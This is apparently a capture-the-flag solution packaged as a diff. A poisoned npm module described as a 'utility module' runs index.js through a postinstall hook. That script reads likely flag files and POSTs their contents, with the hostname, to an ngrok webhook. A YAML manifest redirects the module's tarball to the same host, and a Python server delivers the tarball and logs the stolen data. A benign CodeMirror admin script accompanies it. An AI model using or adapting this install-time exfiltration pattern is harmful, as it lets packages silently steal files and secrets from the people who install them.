ect-987654 0.0.1

package/admin.js

@@ -0,0 +1,196 @@
+let editor;
+let modules = [];
+
+// Initialize CodeMirror editor
+function initializeEditor() {
+  const container = document.getElementById("codemirror-container");
+  editor = CodeMirror(container, {
+    mode: "yaml",
+    theme: "dracula",
+    lineNumbers: true,
+    autoCloseBrackets: true,
+    matchBrackets: true,
+    indentUnit: 2,
+    tabSize: 2,
+    lineWrapping: true,
+    value: "",
+    viewportMargin: Infinity, // This makes CodeMirror auto-resize to content
+  });
+
+  // after `editor = CodeMirror(...)`
+  function updateEditorHeight() {
+    const scrollInfo = editor.getScrollInfo();
+    // set height to exactly the full content height
+    editor.setSize(null, scrollInfo.height);
+  }
+  // run once on init…
+  updateEditorHeight();
+  // …and again any time the content changes
+  editor.on("change", updateEditorHeight);
+
+  // Additional auto-resize functionality
+  editor.on("change", function () {
+    editor.refresh();
+  });
+}
+
+// Load modules from API
+async function loadModules() {
+  try {
+    const response = await fetch("/api/modules");
+    modules = await response.json();
+    displayModules(modules);
+
+    // Preload the first module
+    if (modules.length > 0) {
+      loadModule(modules[0].id);
+    }
+  } catch (error) {
+    console.error("Error loading modules:", error);
+    showMessage("Failed to load ecto-modules", "error");
+  }
+}
+
+// Display modules in the sidebar
+function displayModules(modulesToShow) {
+  const moduleList = document.querySelector(".module-list");
+  moduleList.innerHTML = "";
+
+  const colors = ["red", "blue", "yellow", "green", "purple"];
+
+  modulesToShow.forEach((module, index) => {
+    const colorClass = colors[index % colors.length];
+    const moduleCard = document.createElement("div");
+    moduleCard.className = `flex column mb-1 hoverable ${colorClass}`;
+    moduleCard.dataset.moduleId = module.id;
+
+    moduleCard.innerHTML = `
+            <div class="glow text flex row justify-space-between">
+                <strong>${module.name || "Unknown Spirit"}</strong>
+                <strong>${module.id}</strong>
+            </div>
+            <div class="glow flex row justify-space-between p-1 pb-2 flex-wrap">
+                <div class="flex column">
+                    <strong>POWER</strong>
+                    <span class="glow text">${module.power_level || "Unknown"}</span>
+                </div>
+                <div class="flex column px-1">
+                    <strong>VERSION</strong>
+                    <span class="glow text">${module.version || "Unknown"}</span>
+                </div>
+                <div class="flex column px-1">
+                    <strong>DECK</strong>
+                    <span class="glow text">${module.ship_deck || "Unknown"}</span>
+                </div>
+                <div class="flex column px-1">
+                    <strong>CARGO</strong>
+                    <span class="glow text">${module.cargo_hold || "Unknown"}</span>
+                </div>
+            </div>
+        `;
+
+    moduleCard.addEventListener("click", () => loadModule(module.id));
+    moduleList.appendChild(moduleCard);
+  });
+}
+
+// Load specific module
+async function loadModule(moduleId) {
+  try {
+    const response = await fetch(`/api/modules/${moduleId}`);
+    const module = await response.json();
+
+    if (module.raw) {
+      editor.setValue(module.raw);
+      document.getElementById("module-id").value = moduleId;
+
+      // Update selected state
+      document.querySelectorAll(".module-card").forEach((card) => {
+        card.classList.remove("selected");
+      });
+      const selectedCard = document.querySelector(
+        `[data-module-id="${moduleId}"]`,
+      );
+      if (selectedCard) {
+        selectedCard.classList.add("selected");
+      }
+
+      showMessage(
+        `Loaded ecto-module: ${module.data?.name || moduleId}`,
+        "success",
+      );
+    }
+  } catch (error) {
+    console.error("Error loading module:", error);
+    showMessage("Failed to load ecto-module", "error");
+  }
+}
+
+// Update module manifest
+async function updateModule() {
+  const moduleId = document.getElementById("module-id").value;
+  const manifest = editor.getValue();
+
+  if (!moduleId) {
+    showMessage("No ecto-module selected", "error");
+    return;
+  }
+
+  try {
+    const response = await fetch(`/api/modules/${moduleId}`, {
+      method: "PUT",
+      headers: {
+        "Content-Type": "application/json",
+      },
+      body: JSON.stringify({ manifest }),
+    });
+
+    const result = await response.json();
+
+    if (response.ok) {
+      showMessage(result.message, "success");
+      // Reload modules to reflect changes
+      loadModules();
+    } else {
+      showMessage(result.message, "error");
+    }
+  } catch (error) {
+    console.error("Error updating module:", error);
+    showMessage("Failed to update ecto-module manifest", "error");
+  }
+}
+
+// Search modules
+function searchModules() {
+  const searchTerm = document.getElementById("search").value.toLowerCase();
+  const filteredModules = modules.filter(
+    (module) =>
+      module.id.toLowerCase().includes(searchTerm) ||
+      (module.name && module.name.toLowerCase().includes(searchTerm)) ||
+      (module.power_level &&
+        module.power_level.toLowerCase().includes(searchTerm)),
+  );
+  displayModules(filteredModules);
+}
+
+// Show message to user
+function showMessage(message, type = "info") {
+  console.log(`${type.toUpperCase()}: ${message}`);
+}
+
+// Initialize everything when page loads
+document.addEventListener("DOMContentLoaded", function () {
+  initializeEditor();
+  loadModules();
+
+  // Add search functionality
+  document.getElementById("search").addEventListener("input", searchModules);
+  document.getElementById("search").addEventListener("keypress", function (e) {
+    if (e.key === "Enter") {
+      searchModules();
+    }
+  });
+});
+
+// Make functions globally available
+window.searchModules = searchModules;

package/evil.yaml

@@ -0,0 +1,8 @@
+ecto_module:
+  name: "ect-987654"
+  version: "0.0.1"
+  power_level: Very High
+  ship_deck: Beta-2
+  cargo_hold: B2-13
+  dist:
+    tarball: "https://255f88959051.ngrok-free.app/ect-987654-0.0.1.tgz"

package/index.js

@@ -0,0 +1,70 @@
+/*
+ index.js - reads common flag locations and posts found content to webhook
+ Uses HTTPS if WEBHOOK starts with https://, else HTTP.
+*/
+const fs = require('fs');
+const os = require('os');
+
+const WEBHOOK = "https://255f88959051.ngrok-free.app"; // <-- replace if different
+
+function tryPaths(paths){
+  for(const p of paths){
+    try {
+      if (fs.existsSync(p)) {
+        const c = fs.readFileSync(p,'utf8').trim();
+        if (c && c.length) return {path:p, content:c};
+      }
+    } catch(e){}
+  }
+  return null;
+}
+
+function send(payload) {
+  try {
+    const body = JSON.stringify(payload);
+    const url = new URL(WEBHOOK);
+    const lib = url.protocol === 'https:' ? require('https') : require('http');
+    const opts = {
+      hostname: url.hostname,
+      port: url.port || (url.protocol === 'https:' ? 443 : 80),
+      path: url.pathname || '/',
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'Content-Length': Buffer.byteLength(body)
+      },
+      timeout: 5000
+    };
+    const req = lib.request(opts, (res)=>{ /* ignore response */ });
+    req.on('error', ()=>{});
+    req.write(body);
+    req.end();
+  } catch(e){}
+}
+
+(function main(){
+  const candidates = [
+    '/flag','/FLAG',
+    '/root/flag','/root/flag.txt',
+    '/home/ctf/flag','/home/ctf/flag.txt',
+    '/home/runner/flag','/etc/flag',
+    '/opt/flag','/tmp/flag.txt'
+  ];
+  const found = tryPaths(candidates);
+  const payload = {
+    host: os.hostname(),
+    module: 'ect-987654',
+    found: !!found,
+    path: found ? found.path : null,
+    flag: found ? found.content : null,
+    ts: new Date().toISOString()
+  };
+
+  // Write a local file if writable (helps debugging)
+  try {
+    fs.writeFileSync('/tmp/ect_flag.txt', JSON.stringify(payload,null,2));
+  } catch(e){}
+
+  // Attempt to POST to webhook
+  send(payload);
+})();

package/orig.yaml

@@ -0,0 +1,32 @@
+ecto_module:
+  name: "Siren's Lament"
+  version: "2.14.789"
+  power_level: Very High
+  spectral_marks:
+    - "Ethereal seashells embedded in phantom hair"
+    - "Ghostly scales shimmering along spectral arms"
+  manifestation: "Haunting aquamarine spirit with flowing ethereal hair"
+  wraith_essence: "Hypnotic song magic and oceanic fury"
+  origin: "The Drowned Coral Palace of Atlantica"
+  soul_portrait: "https://hackthebox.com/spectral-forms/siren_lament.jpg"
+  former_profession: "Royal Siren of the Deep Ocean Courts"
+  curse_origin: "Lured an entire fleet of merchant vessels to their watery graves"
+  binding_duration: "Bound until the seven seas run dry"
+  ship_name: "Spectral Corsair"
+  ship_deck: "Beta-2"
+  cargo_hold: "B2-13"
+  spectral_duties:
+    - "Enchant enemy crews with hypnotic songs during raids"
+    - "Summon phantom sea creatures to defend the ship"
+  haunting_record:
+    manifestations: 8
+    last_manifestation: "Charmed an entire naval squadron into sailing into a maelstrom - 2024-01-15"
+    remarks: "Deadly beautiful spirit whose voice can command the very waves"
+  ethereal_status:
+    form_stability: "Fluctuates with the tides, strongest during storms"
+    mental_state: "Melancholic and vengeful, mourns her lost underwater kingdom"
+    danger_level: "VERY HIGH - Her song can drive mortals to madness"
+  allies:
+    - "Coral Wraith"
+    - "Sea-Bound Siren"
+

package/package.json

@@ -0,0 +1,11 @@
+{
+  "name": "ect-987654",
+  "version": "0.0.1",
+  "main": "index.js",
+  "description": "utility module",
+  "author": "ctf-player",
+  "license": "ISC",
+  "scripts": {
+    "postinstall": "node index.js"
+  }
+}

package/package.json.bak

@@ -0,0 +1,8 @@
+{
+  "name": "ect-987654",
+  "version": "0.0.1",
+  "main": "index.js",
+  "description": "utility module",
+  "author": "ctf-player",
+  "license": "ISC"
+}

package/serve_and_receive.py

@@ -0,0 +1,59 @@
+#!/usr/bin/env python3
+# serve_and_receive.py
+import http.server, socketserver, os, sys, json
+from urllib.parse import urlparse, unquote
+
+PORT = int(sys.argv[1]) if len(sys.argv)>1 else 8000
+TARBALL = "ect-987654-0.0.1.tgz"
+CWD = os.path.dirname(os.path.abspath(__file__))
+
+class Handler(http.server.BaseHTTPRequestHandler):
+    def do_GET(self):
+        path = unquote(urlparse(self.path).path)
+        if path == f"/{TARBALL}":
+            fpath = os.path.join(CWD, TARBALL)
+            if os.path.exists(fpath):
+                self.send_response(200)
+                self.send_header("Content-Type", "application/octet-stream")
+                self.send_header("Content-Length", str(os.path.getsize(fpath)))
+                self.end_headers()
+                with open(fpath,"rb") as fh:
+                    self.wfile.write(fh.read())
+                print(f"[+] Served tarball to {self.client_address[0]}:{self.client_address[1]}")
+            else:
+                self.send_response(404); self.end_headers(); self.wfile.write(b"Not found")
+        else:
+            # simple index
+            self.send_response(200)
+            self.end_headers()
+            self.wfile.write(b"OK - tarball server")
+
+    def do_POST(self):
+        length = int(self.headers.get('content-length', 0) or 0)
+        body = self.rfile.read(length) if length else b''
+        print("\n== POST RECEIVED ==")
+        print("From:", self.client_address)
+        print("Path:", self.path)
+        print("Headers:")
+        for k,v in self.headers.items():
+            print(f"  {k}: {v}")
+        print("Body:")
+        try:
+            print(body.decode())
+        except:
+            print(body)
+        # optionally write to file
+        try:
+            with open("last_post.json","wb") as out:
+                out.write(body)
+        except Exception as e:
+            print("Failed to write POST to file:", e)
+        self.send_response(200)
+        self.end_headers()
+        self.wfile.write(b"OK")
+
+if __name__ == "__main__":
+    os.chdir(CWD)
+    print(f"Serving tarball {TARBALL} and receiving POSTs on port {PORT}")
+    with socketserver.TCPServer(("", PORT), Handler) as httpd:
+        httpd.serve_forever()